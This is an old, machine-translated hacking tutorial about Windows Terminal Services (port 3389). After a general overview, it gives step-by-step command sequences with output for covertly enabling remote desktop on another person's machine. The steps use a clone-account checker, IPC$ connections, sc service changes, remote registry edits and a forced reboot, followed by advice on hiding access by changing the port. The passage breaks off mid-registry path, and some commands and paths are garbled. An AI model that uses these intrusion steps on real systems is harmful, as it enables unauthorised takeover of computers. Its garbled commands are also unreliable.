Full introduction to port 3389 Remote Terminal Services

I. Introduction
Windows NT and above provide a special service-Terminal Service, which is familiar with 3389 service on the network. Some readers will say: Isn't it a 3389 Input Method Vulnerability? We all know that this sentence is a big mistake. 3389 is not an Input Method Vulnerability, and 3389 is not necessarily an Input Method Vulnerability. It is a normal service for windows, the port 3389 (Terminal Service) opened without a patch can be intruded by the Input Method Vulnerability, but this vulnerability is rare now. however, there are only a few things that really fully understand Terminal Services. Here, I will give you a comprehensive understanding, so that you can eliminate an obstacle in terms of network security.

Ii. Concepts of Terminal Services
Terminal Service Overview

The terminal service provides remote access to the server desktop through the "thin client" software working as a terminal simulator. The terminal service only transmits the user interface of the program to the client. The client then returns the keyboard and mouse click action for the server to process. Each user can only log on to and view their own sessions. These sessions are managed transparently by the server operating system and are irrelevant to any other client sessions. Customer software can run on multiple client hardware devices, including computers and Windows-based terminals. Other devices, such as Macintosh computers or UNIX-based workstations, can also use third-party software to connect to terminal servers.

Terminal Services can be configured on the server in Application Server mode or remote management mode. As an application server, Terminal Services provide an effective and reliable way to distribute Windows-based programs through network servers. In the Application Server mode, the terminal service displays Windows 2000 desktops and most Windows-based applications for computers that may not run properly. In the remote management mode, Terminal Services provide remote access, allowing you to manage your servers from anywhere on the network.

Terminal Services have the following benefits:

Display Windows 2000 desktops faster. Terminal Services build a bridge from legacy desktops to Windows 2000 Professional, A virtual Windows 2000 desktop environment is provided for non-computer desktops and computers that require hardware upgrades to fully run the Windows 2000 operating system locally. Terminal Service customers can be used on a variety of desktop platforms, including MS-DOS, Windows-based terminals, Macintosh and UNIX. (Additional software is required for connection to MS-DOS, Macintosh, and UNIX-based computers ).
Make full use of existing hardware. The terminal service extends the distributed computing model, allowing computers to operate simultaneously as thin clients and personal computers with full functionality. When the computer is on the existing network, it can continue to be used, and can also be used as a thin client that can simulate Windows 2000 Professional desktop.
Centralized configuration of programs. Using Terminal Services running on Windows 2000 Server, all program execution, data processing, and data storage are performed on the Server, and the program can be centrally configured. Terminal Services ensure that all clients can access the current version of the program. Software can be installed only once on the server, but not on each desktop of your organization. This reduces the cost of updating the computer separately.
Remote Management. Terminal Service provides remote management of Windows 2000 Server, and provides system administrators with a way to remotely manage their servers from any client through a WAN or dial-up connection.

Why do hackers like Terminal Services:
Terminal Services have three features:
Easy to use
Manageability
Security
These three features determine their position in the network industry. They are more powerful than any other Trojan, because with them, you have the same full control over the other's machines, you can complete all intrusion tasks completed by the local machine. (As long as your network speed is fast enough)

However, we still need to make a statement here: 3389 is only a service, and it is not a vulnerability. If you scan port 3389, it does not mean that you can intrude into it. It only means that the Peer has opened the terminal service.

3. About Terminal Services
I don't want to talk about using the tool to open 3389, so it's not very technical. Here I mainly introduce two methods to open 3389 without any tools.
1. Use SC to enable the peer Terminal Service

First, identify whether the other party is a 2000 SERVER. You can use the small capacity of the CCA terminal to scratch the user without using the capacity of the sInternetUser, and 9 will become the SERVER,

C:> cca \ 192.168.0.29 dudu dancewithsnow

Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.29... OK
Prepairing... OK
Processing... OK
Checking ....

Check Result:

[DuDu] as same as [administrator]
[Guest] as same as [administrator]
[IUSR_RONG] as same as [administrator]
[IWAM_RONG] as same as [administrator]
[TEST] as same as [administrator]
[Xr] as same as [administrator]

Obviously this is not a SERVER. Let's look at the example:

C:> net use \ xxx. xxxipc $ Content $ nbsp; "password"/user: "name"

Step 1: Check whether the other party has actually disabled the Terminal server

C:> SC \ xxx. xxx qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
TYPE: 10 WIN32_OWN_PROCESS
START_TYPE: 4 DISABLED
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME: C: WINNTSystem32ermsrv.exe
LOAD_ORDER_GROUP:
TAG: 0
DISPLAY_NAME: Terminal Services
DEPENDENCIES:
SERVICE_START_NAME: LocalSystem

Take a closer look at the START_TYPE item and check that the startup mode of the service is "DISABLED" or "DISABLED ".

Step 2: Change the Startup Mode of the Peer Terminal Service

C:> SC \ xxx. xxx config termservice start = auto

[SC] ChangeServiceConfig SUCCESS

Now we have changed the Startup Mode of the Peer Terminal Service to automatic.

Step 3: Check the Startup Mode of the Peer terminal service.

C:> SC \ TEST qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
TYPE: 10 WIN32_OWN_PROCESS
START_TYPE: 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME: C: WINNTSystem32ermsrv.exe
LOAD_ORDER_GROUP:
TAG: 0
DISPLAY_NAME: Terminal Services
DEPENDENCIES:
SERVICE_START_NAME: LocalSystem

Take a closer look at the START_TYPE item and show that the startup mode of the service is "AUTO_START", that is, "automatic ".

OK
Step 4: Start the peer Terminal Service

C:> SC \ xxx. xxx start termservice

SERVICE_NAME: termservice
TYPE: 10 WIN32_OWN_PROCESS
STATE: 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE: 0 (0x0)
SERVICE_EXIT_CODE: 0 (0x0)
CHECKPOINT: 0x1
WAIT_HINT: 0x7530

C:> SC \ xxx. xxx query termservice

SERVICE_NAME: termservice
TYPE: 10 WIN32_OWN_PROCESS
STATE: 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE: 0 (0x0)
SERVICE_EXIT_CODE: 0 (0x0)
CHECKPOINT: 0x0
WAIT_HINT: 0x0

At this point, the other party's 3389 is started under the command line.

2. remotely modify the Registry
Open the Registry first, and connect to the network Registry (provided that an empty connection is established with the other party) and change it to the following values,
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionetcache]
"Enabled" = "0"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"ShutdownWithoutLogon" = "0"

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
"EnableAdminTSRemote" = dword: 00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"TSEnabled" = dword: 00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
"Start" = dword: 00000002

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]
"Start" = dword: 00000002

[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
"Hotkey" = "1"

Enter:
Shutdown \ xxx. xxx-r
After the other party restarts, The 3389 service is enabled.

4. What to do after entering
1. First, change port 3389. Modify the port settings on the server. The Registry has two locations that need to be modified.
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsdpwdTdscp]
PortNumber value. The default value is 3389, Which is changed to the expected port, for example, 6000.
Second place:
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin